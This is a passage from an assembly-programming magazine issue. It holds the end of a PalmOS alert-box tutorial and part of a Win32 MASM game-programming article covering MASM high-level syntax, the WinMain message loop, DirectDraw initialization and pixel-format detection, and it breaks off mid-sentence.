; resource is going to be created, since that's all we need

         ALERT ID 1000
; This is the ID of our Alert.

         INFORMATION
; This is the TYPE of the Alert. It could be [INFORMATION]
; or [CONFIRMATION] or [WARNING] or [ERROR]

         BEGIN
; Beginning of the Alert resource. Let's define all its properties.

         TITLE "Hello tiny World!"
; This would be the title of the Alert

         MESSAGE "This is just the beginning!"
; Yes, you guessed it. It's the Message

         BUTTONS "Ciao :)"
; In this case we have only one button

         END
; END of the Alert resource


The asm file (Hello.asm):
-------------------------

Appl    "MBox", 'Lat1'

; This sets the program's name and ID. The name is the one that will show up
; in the list of installed programs. The ID is just that, an ID :)

include "Pilot.inc"
; Just like windows.inc: full of constants, structure offsets, API trap
; codes, etc.

include "Startup.inc"
; Startup.inc contains a standard startup function which must be the first
; within an application and is called by the PalmOS after the app is loaded.
; SysAppStartup is first executed, if it doesn't fail, then PilotMain in our
; app is called and after it returns, SysAppExit is called. In short, don't
; remove this :)


MyAlert   equ     1000
; Some Constants

         code

proc PilotMain(cmd.w, cmdPBP.l, launchFlags.w)

; Just like WinMain; PilotMain's prototype is in Pilot.inc.
; It takes three parameters, a WORD (cmd), a LONG (cmdPBP) and another WORD
; (launchFlags)
; Whenever parameters are passed to API calls, their size has to be
; specified too: '.b' for a byte, '.w' for a word and '.l' for a long.
; Remember that PilotMain is called from StartUp.inc!!

beginproc
; Marks the beginning of a procedure by reserving the needed space on the
; stack for local variables, if any. To do this it performs link a6,#nnnn,
; where #nnnn is the number of bytes.

TST.W   cmd(a6)
; PilotMain is called many times in different circumstances, so here we
; check that the cmd parameter is 0 (sysAppLaunchCmdNormalLaunch is 0), which
; means a 'normal' program launch.
; TST.W cmd(a6) means 'CMP WORD PTR cmd,0' in the Intel environment. .W
; implies that only 2 bytes of the cmd variable will be TeSTed. cmd(a6) tells
; pila that cmd is addressed through a6, so it is LOCAL to this procedure.
; Had it been cmd(a5), the assembler would know that cmd is a GLOBAL
; variable.

BNE     PmReturn
; BNE = Branch Not Equal. Just like the beloved JNZ

systrap FrmAlert(#MyAlert.w)
; MessageBox! :) systrap is the keyword to invoke APIs; it PUSHes the
; specified parameters and cleans the stack after the API executes.
; # means that MyAlert is a CONSTANT NUMBER and .w means that it is
; passed as a WORD.
;
; systrap FrmAlert(#MyAlert.w) would be the same as:
; move.w  #MyAlert,-(a7)         = decrement the stack pointer, push alert id
; trap    #15                    = PalmOS API call
; dc.w    sysTrapFrmAlert        = invoke the alert dialog! by declaring the
;                                  word that is equivalent to 'sysTrapFrmAlert'
; addq.l  #2,a7                  = correct stack


PmReturn
; Just a Label

endproc
; Sefiní, endproc executes the unlk and rts instructions

;-----------------------Resources------------------------------
; Here we must 'tell' pila about all the resources that we created so it will
; include them in our assembled code.
; We now declare ALL the resources being used by Hello.asm. The keyword 'res'
; comes first, followed by the TYPE of the resource.


         ;-=Alert   Resources=-
res 'Talt', MyAlert, "Talt03e8.bin"


         ; This resource defines launch flags, stack and heap size :)
res     'pref', 1
         dc.w    sysAppLaunchFlagNewStack|sysAppLaunchFlagNewGlobals|sysAppLaunchFlagUIApp|sysAppLaunchFlagSubCall
         dc.l    $1000                   ; stack size
         dc.l    $1000                   ; heap size


;------------------------------ end ------------------------------------------

That's all, my friends! To assemble and link this program, execute the
following:

         pilrc Hello.rcp
         pila Hello.asm

Pilrc is the resource compiler and pila the assembler, of course.
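
A side note on the file name Talt03e8.bin used in the res line: it matches the
pattern of the four-character resource type followed by the ID written as four
hex digits (1000 decimal is 03e8 hex). Assuming pilrc always names its output
this way, the rule can be sketched in C. The helper name rsrc_file_name is made
up for this illustration and is not part of pilrc or pila.

```c
#include <stdio.h>
#include <stddef.h>

/* Hypothetical helper: builds the file name that pilrc is assumed to give
   a compiled resource, i.e. <4-char type><ID as 4 hex digits>.bin.
   Returns the length of the name, as snprintf does. */
int rsrc_file_name(char *out, size_t out_size, const char *type, unsigned id)
{
    return snprintf(out, out_size, "%.4s%04x.bin", type, id & 0xFFFFu);
}
```

Called with the type "Talt" and the ID 1000, this gives the name that the res
line in Hello.asm refers to.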
Well, that's it! Easy, huh? Next time I'll complicate things a little bit by
including a Form :)
Should your Palm Asm hunger be unstoppable, you could check my site
for more coding and reversing stuff: www.latigo.cjb.net.

Take Care! Bye!

Latigo



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.............................................GAMING.CORNER
                                             Win32 ASM Game Programming - Part 2
                                             by Chris Hobbs


[This series of articles was first posted at GameDev.net and is now being
published here with the author's permission. Here is Chris Hobbs' introduction
to this particular article:

"A continuation of the development of SPACE-TRIS. This one covers the coding
   of WinMain, a Direct Draw library, and a Bitmap library."

Visit his website at http://www.fastsoftware.com.
Preface, HTML-to-text conversion and formatting by Chili]


Where Did We Leave Off?
-----------------------
The last article discussed many basics of Win32 ASM programming, introduced
you to the game we will be creating, and guided you through the design
process. Now it is time to take it a few steps further. First, I will cover,
in depth, the High Level constructs of MASM that make it extremely readable
(at generally no performance cost) and as easy to write as C expressions.
Then, once we have a solid foundation in our assembler, we will take a look at
the Game Loop and the main Windows procedures in the code. With that out of
the way we will take a peek at Direct Draw and the calls associated with it.
Once we understand how DirectX works we can build our Direct Draw library.
After that we will build our bitmap file library. Finally, we will put it all
together in a program that displays our Loading Game screen and exits when you
hit the escape key.

It is a pretty tall order, but I am pretty sure we can cover all of the topics
in this article. Remember: if you want to compile the code you need the MASM32
[http://www.pbq.com.au/home/hutch/] package, or at the very least a copy of
MASM 6.11+.

If you are already familiar with MASM's HL syntax then I would suggest
skipping the next section. However, those of you who are rusty, or have never
even heard of it, head on to the next section. There you will learn more than
you will probably ever need to know about this totally cool addition to our
assembler.


MASM's HL Syntax
----------------
I am sure many of you have seen an old DOS assembly language listing. Take a
moment to recall that listing, and picture the code. Scary? Well, 9 times out
of 10 it was scary. Most ASM programmers wrote very unreadable code, simply
because that was the nature of their assembler. It was littered with labels
and jmps, and all sorts of other mysterious things. Try stepping through it
with your mental computer. Did you crash? Yeah, don't feel bad. It is just how
it is. Now, that was the 9 out of 10 ... what about that 1 out of 10? What is
the deal with them? Well, those are the programmers who coded macros to
provide High Level constructs in their programs. For once, Microsoft did
something incredibly useful with MASM 6.0 ... they built those HL macros, that
smart programmers had devised, into MASM as pseudo-ops.

If you aren't aware of what this means I will let you in on it. MASM's
assembly code is now just as readable and easy to write as C. This, of course,
is just my opinion. But, it is an opinion shared by thousands and thousands of
ASM coders. So, now that I have touted its usefulness let's take a look at
some C constructs and their MASM counterparts.


                               IF - ELSE IF - ELSE

         The C version:                          The MASM version:

         if ( var1 == var2 )                     .if ( var1 == var2 )
         {                                           ; Code goes here
             // Code goes here                   .elseif ( var1 == var3 )
         }                                           ; Code goes here
         else                                    .else
         if ( var1 == var3 )                         ; Code goes here
         {                                       .endif
             // Code goes here
         }
         else
         {
             // Code goes here
         }


                                   DO - WHILE

         The C version:                          The MASM version:

         do                                      .repeat
         {                                           ; Code goes here
             // Code goes here                   .until ( var1 != var2 )
         }
         while ( var1 == var2 );


                                      WHILE

         The C version:                          The MASM version:

         while ( var1 == var2 )                  .while ( var1 == var2 )
         {                                           ; Code goes here
             // Code goes here                   .endw
         }


Those are the constructs that we can use in our code. As you can see, they are
extremely simple and allow for nice readable code, something assembly language
has long been without. There is no performance loss for using these
constructs, at least I haven't found any. They typically generate the same cmp
and jmp code that a programmer would write by hand with labels and such. So,
feel free to use them in your code as you see fit ... they are a great asset.
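
To make the "same cmp and jmp code" remark concrete, here is a rough sketch in
C rather than MASM. The first function is the readable form; the second spells
out the same decision with explicit compares and jumps, roughly the shape a
hand-written label version would take. The function names and return values
are invented for the illustration, and the exact instructions MASM emits are
not shown in this article.

```c
/* High-level form, as one would write it with .if/.elseif/.else */
int classify_hl(int var1, int var2, int var3)
{
    if (var1 == var2)
        return 1;
    else if (var1 == var3)
        return 2;
    else
        return 3;
}

/* The same logic written as compares and jumps to labels */
int classify_jumps(int var1, int var2, int var3)
{
    int result;

    if (var1 != var2) goto try_elseif;   /* cmp / jne */
    result = 1;
    goto done;                           /* jmp past the other branches */
try_elseif:
    if (var1 != var3) goto do_else;      /* cmp / jne */
    result = 2;
    goto done;                           /* jmp */
do_else:
    result = 3;
done:
    return result;
}
```

Both functions give the same answer for every input; only the readability
differs.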

There is one other thing we should discuss, and that is the pseudo-ops that
allow us to define procedures/functions easily: PROTO and PROC. Using them is
really simple. To begin with, just as in C, you need to have a prototype. In
MASM this is done with the PROTO keyword. Here are some examples of declaring
prototypes for your procedures:


         ;==================================
         ; Main Program Procedures
         ;==================================
         WinMain PROTO           :DWORD,:DWORD,:DWORD,:DWORD
         WndProc PROTO           :DWORD,:DWORD,:DWORD,:DWORD


The above code tells the assembler it should expect a procedure by the name of
WinMain and one by the name of WndProc. Each of these has a parameter list
associated with it. They both happen to expect 4 DWORD values to be passed to
them. For those of you using the MASM32 package, you already have all of the
Windows API functions prototyped; you just need to include the appropriate
include file. But you need to make sure that any user-defined procedure is
prototyped in the above fashion.

Once we have the function prototyped we can create it. We do this with the
PROC keyword. Here is an example:


;########################################################################
; WinMain Function
;########################################################################
WinMain PROC    hInstance       :DWORD,
                 hPrevInst       :DWORD,
                 CmdLine         :DWORD,
                 CmdShow         :DWORD




         ;===========================
         ; We are through
         ;===========================
         return msg.wParam

WinMain endp
;########################################################################
; End of WinMain Procedure
;########################################################################


By writing our functions in this manner we can access all passed parameters by
the name we give to them. The above function is WinMain without any code in
it. You will see the code in a minute. For now though, pay attention to how we
set up the procedure. Also notice how it allows us to create much cleaner
looking code, just like the rest of the high level constructs in MASM do.


Getting A Game Loop Running
---------------------------
Now that we all know how to use our assembler, and the features contained in
it, let's get a basic game shell up and running.

The first thing we need to do is get set up to enter WinMain(). You may be
wondering why the code doesn't start at WinMain() like in C/C++. The answer
is: in C/C++ it doesn't start there either. The code that we will write is
generated for you by the compiler, therefore it is completely transparent to
you. We will most likely do it differently than the compiler, but the premise
will be the same. So here is what we will code to get into the WinMain()
function...


   .CODE

start:
         ;==================================
         ; Obtain the instance for the
         ; application
         ;==================================
         INVOKE GetModuleHandle, NULL
         MOV     hInst, EAX

         ;==================================
         ; Is there a commandline to parse?
         ;==================================
         INVOKE GetCommandLine
         MOV     CommandLine, EAX

         ;==================================
         ; Call the WinMain procedure
         ;==================================
         INVOKE WinMain,hInst,NULL,CommandLine,SW_SHOWDEFAULT

         ;==================================
         ; Leave the program
         ;==================================
         INVOKE ExitProcess,EAX


The only thing that may seem a little confusing is why we MOV EAX into a
variable after an INVOKE. The reason is that all Windows functions, and C
functions for that matter, place the return value of a function/procedure in
EAX. So we are effectively doing an assignment statement with a function when
we move a value from EAX into something. The code above is going to be the
same for every Windows application that you write. At least, I have never had
need to change it. The code simply sets everything up and ends it when we are
finished.

If you follow the code you will see that it calls WinMain() for us. This is
where things can get a bit confusing ... so let's have a look at the code
first.


;########################################################################
; WinMain Function
;########################################################################
WinMain PROC    hInstance       :DWORD,
                 hPrevInst       :DWORD,
                 CmdLine         :DWORD,
                 CmdShow         :DWORD

         ;====================
         ; Put LOCALs on stack
         ;====================
         LOCAL wc        :WNDCLASS

         ;==================================================
         ; Fill WNDCLASS structure with required variables
         ;==================================================
         MOV     wc.style, CS_OWNDC
         MOV     wc.lpfnWndProc,OFFSET WndProc
         MOV     wc.cbClsExtra,NULL
         MOV     wc.cbWndExtra,NULL
         m2m     wc.hInstance,hInst      ;<< NOTE: macro not mnemonic
         INVOKE GetStockObject, BLACK_BRUSH
         MOV     wc.hbrBackground, EAX
         MOV     wc.lpszMenuName,NULL
         MOV     wc.lpszClassName,OFFSET szClassName
         INVOKE LoadIcon, hInst, IDI_ICON        ; icon ID
         MOV     wc.hIcon,EAX
         INVOKE LoadCursor,NULL,IDC_ARROW
         MOV     wc.hCursor,EAX

         ;================================
         ; Register our class we created
         ;================================
         INVOKE RegisterClass, ADDR wc

         ;===========================================
         ; Create the main screen
         ;===========================================
         INVOKE CreateWindowEx,NULL,
                 ADDR szClassName,
                 ADDR szDisplayName,
                 WS_POPUP OR WS_CLIPSIBLINGS OR \
                 WS_MAXIMIZE OR WS_CLIPCHILDREN,
                 0,0,640,480,
                 NULL,NULL,
                 hInst,NULL

         ;===========================================
         ; Put the window handle in for future uses
         ;===========================================
         MOV     hMainWnd, EAX

         ;====================================
         ; Hide the cursor
         ;====================================
         INVOKE ShowCursor, FALSE

         ;===========================================
         ; Display our Window we created for now
         ;===========================================
         INVOKE ShowWindow, hMainWnd, SW_SHOWDEFAULT

         ;=================================
         ; Initialize the Game
         ;=================================
         INVOKE Game_Init

         ;========================================
         ; Check for an error if so leave
         ;========================================
         .IF EAX != TRUE
                 JMP shutdown
         .ENDIF

         ;===================================
         ; Loop until PostQuitMessage is sent
         ;===================================
         .WHILE TRUE
                 INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE
                 .IF (EAX != 0)
                         ;===================================
                         ; Break if it was the quit message
                         ;===================================
                         MOV EAX, msg.message
                         .IF EAX == WM_QUIT
                                 ;======================
                                 ; Break out
                                 ;======================
                                 JMP shutdown
                         .ENDIF

                         ;===================================
                         ; Translate and Dispatch the message
                         ;===================================
                         INVOKE TranslateMessage, ADDR msg
                         INVOKE DispatchMessage, ADDR msg

                 .ENDIF

                 ;================================
                 ; Call our Main Game Loop
                 ;
                 ; NOTE: This is done every loop
                 ; iteration no matter what
                 ;================================
                 INVOKE Game_Main

         .ENDW

shutdown:
         ;=================================
         ; Shutdown the Game
         ;=================================
         INVOKE Game_Shutdown

         ;=================================
         ; Show the Cursor
         ;=================================
         INVOKE ShowCursor, TRUE

getout:
         ;===========================
         ; We are through
         ;===========================
         return msg.wParam

WinMain endp
;########################################################################
; End of WinMain Procedure
;########################################################################


This is quite a bit of code and is rather daunting at first glance. But, let's
examine it a piece at a time. First we enter the function; notice that the
local variables (in this case a WNDCLASS variable) get placed on the stack
without your having to code anything. The code is generated for you ... you
can declare local variables like in C. Thus, at the end of the procedure we
don't need to tell the assembler how much to pop off of the stack ... it is
done for us also. Then, we fill in this structure with various values and
variables. Note the use of m2m, a macro rather than an instruction. It is
needed because in ASM you are not allowed to move a memory value to another
memory location without placing it in a register, or on the stack, first.

Next, we make some calls to register our window class and create a new window.
Then, we hide the cursor. You may want the cursor ... but for our game we do
not. Now we can show our window and try to initialize our game. We check for
an error after calling the Game_Init() procedure. If there was an error the
function would not return TRUE, and this would cause our program to jump to
the shutdown label. It is important that we jump over the main message loop.
If we do not, the program will continue executing. Also, make sure that you do
not just return out of the code ... there still may be some things that need
to be shut down. It is good practice in ASM, just as in all other languages,
to have one entry point and one exit point in each of your procedures -- this
makes debugging easier.
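
The "jump to the shutdown label instead of returning" pattern looks much the
same in C. The sketch below is only an illustration: game_init, game_main and
game_shutdown are hypothetical stand-ins for Game_Init, Game_Main and
Game_Shutdown, and the frame count replaces the real message loop.

```c
#include <stdbool.h>

/* Hypothetical stand-ins for Game_Init / Game_Main / Game_Shutdown */
int shutdown_calls;                       /* counts cleanup runs */
static bool game_init(bool succeed) { return succeed; }
static void game_main(void)         { }
static void game_shutdown(void)     { ++shutdown_calls; }

/* Returns the number of frames that ran. */
int run_game(bool init_ok, int frames)
{
    int ran = 0;

    if (!game_init(init_ok))
        goto shutdown;          /* skip the loop, but not the cleanup */

    while (ran < frames) {
        game_main();
        ++ran;
    }

shutdown:
    game_shutdown();            /* the single exit path */
    return ran;
}
```

Whether initialization fails or the loop ends normally, control leaves through
the same cleanup code, so nothing that was set up is left behind.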

Now for the meat of WinMain(): the message loop. For those of you that have
never seen a Windows message loop before, here is a quick explanation. Windows
maintains a queue of messages that the application receives -- whether from
other applications, user generated, or internal. In order to do ANYTHING an
application must process messages. These tell you that a key has been pressed,
the mouse button clicked, or the user wants to exit your program. If this were
a normal program, and not a high performance game, we would use GetMessage()
to retrieve a message from the queue and act upon it.

The problem, however, is that if there are no messages, GetMessage() WAITS
until it receives one. This is totally unacceptable for a game. We need to be
constantly performing our loop, no matter what messages we receive. So, one
way around this is to use PeekMessage() instead. PeekMessage() will return
zero if there are no messages; otherwise it will grab one off of the queue.

What this means is, if we have a message, it will get translated and
dispatched to our callback function. Furthermore, if we do not, then the main
game loop will be called instead. Now here is the trick: by arranging the code
just right, the main game loop will be called -- even if we process a message.
If we did not do this, then Windows could process 1,000's of messages while
our game loop wouldn't execute once!

Finally, when a quit message is passed to the queue we will jump out of our
loop and execute the shutdown code. And that ... is the basic game loop.
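
The shape of that loop can be tried out without Windows at all. The C sketch
below simulates it with a made-up message queue: peek_message plays the role
of PeekMessage() with PM_REMOVE (it never waits), and the frame counter stands
in for Game_Main. All names and message codes here are invented for the
illustration.

```c
#include <stdbool.h>
#include <stddef.h>

enum { MSG_KEY = 1, MSG_QUIT = 2 };   /* made-up message codes */

typedef struct {
    const int *items;   /* pending messages */
    size_t     count;
    size_t     next;
} MsgQueue;

/* Non-blocking: returns false at once when the queue is empty
   instead of waiting for a message to arrive. */
static bool peek_message(MsgQueue *q, int *msg)
{
    if (q->next >= q->count)
        return false;
    *msg = q->items[q->next++];
    return true;
}

/* Runs until MSG_QUIT is seen or max_iterations passes are done.
   Returns how many times the game logic ran. */
int game_loop(MsgQueue *q, int max_iterations, int *dispatched)
{
    int frames = 0;
    *dispatched = 0;

    for (int i = 0; i < max_iterations; ++i) {
        int msg;
        if (peek_message(q, &msg)) {
            if (msg == MSG_QUIT)
                break;
            ++*dispatched;      /* translate and dispatch would go here */
        }
        ++frames;               /* game logic runs every pass, message or not */
    }
    return frames;
}
```

With two key messages followed by a quit message, the game logic runs twice,
once per handled message. With an empty queue it still runs on every pass,
which is the whole point of peeking instead of waiting.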


Connecting to Direct Draw
-------------------------
Now we are going to get a little bit advanced. But, only for this section.
Unfortunately there is no cut-and-dried way to view DirectX in assembly. So, I
am going to explain it briefly, show you how to use it, and then forget about
it. This is not that imperative to know about, but it helps if you at least
understand the concepts.

The very first thing you need to understand is the concept of a Virtual
Function Table. This is where your call really goes, to be blunt about it. The
call offsets into this table, and from it selects the proper function address
to jump to. What this means to you is that your call to a function is actually
a call through a simple look-up table that is already generated. In this way,
DirectX, or any other library built like DirectX, can change functions in a
library without you ever having to know about it.
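
A small C sketch may help picture the table. Everything in it (Device,
DeviceVtbl, GetVersion, the two implementations) is invented for the
illustration and is not DirectX's actual layout; the point is only that the
caller goes through the table, so the library side can swap the function
behind a slot without the caller changing.

```c
typedef struct Device Device;

/* The look-up table: one function pointer per method, in a fixed order. */
typedef struct {
    int (*GetVersion)(Device *self);
} DeviceVtbl;

/* The object's first field points at its table. */
struct Device {
    const DeviceVtbl *vtbl;
};

/* Two library-side implementations of the same slot. */
static int get_version_v1(Device *self) { (void)self; return 1; }
static int get_version_v2(Device *self) { (void)self; return 2; }

static const DeviceVtbl vtbl_v1 = { get_version_v1 };
static const DeviceVtbl vtbl_v2 = { get_version_v2 };

/* Caller's code: it never names either implementation. It fetches the
   address from the table and passes the object as the first argument. */
int query_version(Device *dev)
{
    return dev->vtbl->GetVersion(dev);
}
```

query_version is identical for both objects; which routine actually runs is
decided by the table the object carries.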

Once we have gotten that straight we can figure out how to make calls in
DirectX. Have you guessed how yet? The answer is that we need to mimic the
table in some way so that our call is offset into the virtual table at the
proper address. We start by simply having a base address that gets called,
which is a given in DirectX libraries. Then we make a list of all functions
for that object, appending the size of their parameters. This is our offset
into the table. Now, we are all set to call the functions.

Calling these functions can be a bit of work. First you have to specify the
address of the object that you want to make the call on. Then, you have to
resolve the virtual address, and then, finally, push all of the parameters
onto the stack, including the object, for the call. Ugly, isn't it? For that
reason there is a set of macros provided that will allow you to make calls on
these objects fairly easily. I will only cover one since the rest are based on
the same premise. The most basic one is DD4INVOKE. This macro is for a Direct
Draw 4 object. It is important that we have different invokes for different
versions of the same object. If we did not, then the wrong routines would be
called, since the Virtual Table changes as functions are added to or removed
from the libraries.

The idea behind the macro is fairly simple. First, you specify the function
name, then the object name, and then the parameters. Here is an example:


         ;========================================
         ; Now create the primary surface
         ;========================================
         DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL


The above line of code calls the CreateSurface() function on a Direct Draw 4
object. It passes the pointer to the object, the address of a Direct Draw
Surface Description structure, the address of the variable to hold the pointer
to the surface, and finally NULL. This call is an example of how we will
interface to DirectX in this article series. Now that we have seen how to make
calls to DirectX, we need to build a small library for us to use, which we
cover in the next section.
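
For readers more at home in C, the job of an invoke macro like DD4INVOKE can
be imitated with a C macro. This is only a sketch of the idea, not the macro
from DDraw.inc: Counter, its two methods and OBJ_INVOKE are all invented here.
The macro takes the method name first, then the object, then the remaining
arguments, looks the method up in the object's table, and passes the object
itself as the hidden first argument.

```c
typedef struct Counter Counter;

typedef struct {
    int (*Add)(Counter *self, int amount);
    int (*Reset)(Counter *self);
} CounterVtbl;

struct Counter {
    const CounterVtbl *lpVtbl;   /* table pointer comes first */
    int value;
};

static int counter_add(Counter *self, int amount)
{
    self->value += amount;
    return self->value;
}

static int counter_reset(Counter *self)
{
    self->value = 0;
    return 0;
}

static const CounterVtbl counter_vtbl = { counter_add, counter_reset };

/* Method name, object, then the method's own arguments. */
#define OBJ_INVOKE(method, obj, ...) \
    ((obj)->lpVtbl->method((obj), __VA_ARGS__))

/* Variant for methods that take no arguments besides the object. */
#define OBJ_INVOKE0(method, obj) \
    ((obj)->lpVtbl->method((obj)))
```

A call then reads OBJ_INVOKE(Add, &c, 5), which mirrors the argument order of
the DD4INVOKE line shown earlier in this section.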


Our Direct Draw Library
-----------------------
Alright, we are now ready to start coding our Direct Draw library routines.
So, the logical starting place would be figuring out what kinds of routines we
will need for the game. Obviously we want an initialization and shutdown
routine, and we are going to need a function to lock and unlock surfaces.
Also, it would be nice to have a function to draw text, and, since the game is
going to run in 16 bpp mode, we will want a function that can figure out the
pixel format for us. It would also be a good idea to have a function that
creates surfaces, one that loads a bitmap into a surface, and a function to
flip our buffers for us. That should cover it ... so let's get started.

The first routine that we will look at is the initialization routine. This is
the most logical place to start, especially since the routine has just about
every type of call we will be using in Direct Draw. Here is the code:


;########################################################################
; DD_Init Procedure
;########################################################################
DD_Init PROC    screen_width:DWORD, screen_height:DWORD, screen_bpp:DWORD

         ;=======================================================
         ; This function will setup DD to full screen exclusive
         ; mode at the passed in width, height, and bpp
         ;=======================================================

         ;=================================
         ; Local Variables
         ;=================================
         LOCAL lpdd_1    :LPDIRECTDRAW

         ;=============================
         ; Create a default object
         ;=============================
         INVOKE DirectDrawCreate, 0, ADDR lpdd_1, 0

         ;=============================
         ; Test for an error
         ;=============================
         .IF EAX != DD_OK
                 ;======================
                 ; Give err msg
                 ;======================
                 INVOKE MessageBox, hMainWnd, ADDR szNoDD, NULL, MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;=========================================
         ; Lets try and get a DirectDraw 4 object
         ;=========================================
         DDINVOKE QueryInterface, lpdd_1, ADDR IID_IDirectDraw4, ADDR lpdd

         ;=========================================
         ; Did we get it??
         ;=========================================
         .IF EAX != DD_OK
                 ;==============================
                 ; No so give err message
                 ;==============================
                 INVOKE MessageBox, hMainWnd, ADDR szNoDD4, NULL, MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;===================================================
         ; Set the cooperative level
         ;===================================================
         DD4INVOKE SetCooperativeLevel, lpdd, hMainWnd, \
                 DDSCL_ALLOWMODEX OR DDSCL_FULLSCREEN OR \
                 DDSCL_EXCLUSIVE OR DDSCL_ALLOWREBOOT

         ;=========================================
         ; Did we get it??
         ;=========================================
         .IF EAX != DD_OK
                 ;==============================
                 ; No so give err message
                 ;==============================
                 INVOKE MessageBox, hMainWnd, ADDR szNoCoop, NULL, MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;===================================================
         ; Set the Display Mode
         ;===================================================
         DD4INVOKE SetDisplayMode, lpdd, screen_width, \
                 screen_height, screen_bpp, 0, 0

         ;=========================================
         ; Did we get it??
         ;=========================================
         .IF EAX != DD_OK
                 ;==============================
                 ; No so give err message
                 ;==============================
                 INVOKE MessageBox, hMainWnd, ADDR szNoDisplay, NULL, MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;================================
         ; Save the screen info
         ;================================
         m2m     app_width, screen_width
         m2m     app_height, screen_height
         m2m     app_bpp, screen_bpp

         ;========================================
         ; Setup to create the primary surface
         ;========================================
         DDINITSTRUCT OFFSET ddsd, SIZEOF(DDSURFACEDESC2)
         MOV     ddsd.dwSize, SIZEOF(DDSURFACEDESC2)
         MOV     ddsd.dwFlags, DDSD_CAPS OR DDSD_BACKBUFFERCOUNT;
         MOV     ddsd.ddsCaps.dwCaps, DDSCAPS_PRIMARYSURFACE OR \
                         DDSCAPS_FLIP OR DDSCAPS_COMPLEX
         MOV     ddsd.dwBackBufferCount, 1

         ;========================================
         ; Now create the primary surface
         ;========================================
         DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL

         ;=========================================
         ; Did we get it??
         ;=========================================
         .IF EAX != DD_OK
                 ;==============================
                 ; No so give err message
                 ;==============================
                 INVOKE MessageBox, hMainWnd, ADDR szNoPrimary, NULL, MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;==========================================
         ; Try to get a backbuffer
         ;==========================================
         MOV     ddscaps.dwCaps, DDSCAPS_BACKBUFFER
         DDS4INVOKE GetAttachedSurface, lpddsprimary, \
                 ADDR ddscaps, ADDR lpddsback

         ;=========================================
         ; Did we get it??
         ;=========================================
         .IF EAX != DD_OK
                 ;==============================
                 ; No so give err message
                 ;==============================
                 INVOKE MessageBox, hMainWnd, ADDR szNoBackBuffer, NULL,
                         MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;==========================================
         ; Get the RGB format of the surface
         ;==========================================
         INVOKE DD_Get_RGB_Format, lpddsprimary

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

err:
         ;===================
         ; We didn't make it
         ;===================
         return FALSE

DD_Init      ENDP
;########################################################################
; END DD_Init
;########################################################################


The above code is fairly complex so let's see what each individual section
does.

The first step is to create a default Direct Draw object. This is nothing more
than a simple call with a couple of parameters. NOTE: since it is NOT based on
an already created object, the function is not virtual. Therefore, we can call
it like a normal function using invoke. Also, notice how we check for an error
right afterwards. This is very important in DirectX. In the case of an error,
we merely give a message, and then jump to the error return at the bottom of
the procedure.

The second step is to query for a DirectDraw4 object. We will almost always
want the newest version of the objects, and querying after you have the base
object is the way to get them. If this succeeds we then set the cooperative
level and the display mode for our game. Nothing major ... but don't forget to
check for errors.

Our next step is to create a primary surface for the object that we have. If
that succeeds we get the back buffer attached to it. The structure that we use
in this call, and other DirectX calls, needs to be cleared before using it.
This is done with a macro, DDINITSTRUCT, that I have included in the DDraw.inc
file.

The final thing we do is make a call to our routine that determines the
pixel format for our surfaces. All of these pieces fit together into
initializing our system for use.

The next routine we will look at is the one that obtains the pixel format.
This is a fairly advanced routine, so I wanted to make sure that we cover
it. Here is the code:


;########################################################################
; DD_Get_RGB_Format Procedure
;########################################################################
DD_Get_RGB_Format       PROC    surface:DWORD

         ;=========================================================
         ; This function will set up some globals that give us info
         ; on the pixel format of the current display mode
         ;=========================================================

         ;====================================
         ; Local variables
         ;====================================
         LOCAL shiftcount :BYTE

         ;================================
         ; get a surface description
         ;================================
         DDINITSTRUCT ADDR ddsd, sizeof(DDSURFACEDESC2)
         MOV     ddsd.dwSize, sizeof(DDSURFACEDESC2)
         MOV     ddsd.dwFlags, DDSD_PIXELFORMAT
         DDS4INVOKE GetSurfaceDesc, surface, ADDR ddsd

         ;==============================
         ; fill in masking values
         ;==============================
         m2m     mRed, ddsd.ddpfPixelFormat.dwRBitMask   ; Red Mask
         m2m     mGreen, ddsd.ddpfPixelFormat.dwGBitMask ; Green Mask
         m2m     mBlue, ddsd.ddpfPixelFormat.dwBBitMask  ; Blue Mask

         ;====================================
         ; Determine the pos for the red mask
         ;====================================
         MOV     shiftcount, 0
         .WHILE (!(ddsd.ddpfPixelFormat.dwRBitMask & 1))
                 SHR     ddsd.ddpfPixelFormat.dwRBitMask, 1
                 INC     shiftcount
         .ENDW
         MOV     AL, shiftcount
         MOV     pRed, AL

         ;=======================================
         ; Determine the pos for the green mask
         ;=======================================
         MOV     shiftcount, 0
         .WHILE (!(ddsd.ddpfPixelFormat.dwGBitMask & 1))
                 SHR     ddsd.ddpfPixelFormat.dwGBitMask, 1
                 INC     shiftcount
         .ENDW
         MOV     AL, shiftcount
         MOV     pGreen, AL

         ;=======================================
         ; Determine the pos for the blue mask
         ;=======================================
         MOV     shiftcount, 0
         .WHILE (!(ddsd.ddpfPixelFormat.dwBBitMask & 1))
                 SHR     ddsd.ddpfPixelFormat.dwBBitMask, 1
                 INC     shiftcount
         .ENDW
         MOV     AL, shiftcount
         MOV     pBlue, AL

         ;===========================================
         ; Set a special var if we are in 16 bit mode
         ;===========================================
         .IF app_bpp == 16
                 .IF pRed == 10
                         MOV     Is_555, TRUE
                 .ELSE
                         MOV     Is_555, FALSE
                 .ENDIF
         .ENDIF

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

DD_Get_RGB_Format ENDP
;########################################################################
; END DD_Get_RGB_Format
;########################################################################


First, we initialize our description structure and make a call to get the
surface description from Direct Draw. We place the masks that are returned
in global variables, since we will want to use them in all kinds of places.
A mask is a value that you can use to set or clear certain bits in a
variable/register. In our case, we use them to mask off the unnecessary
bits so that we can access the red, green, or blue bits of our pixel
individually.

The next three sections of code determine the bit position of each color
component, that is, how many bits a component has to be shifted to the left
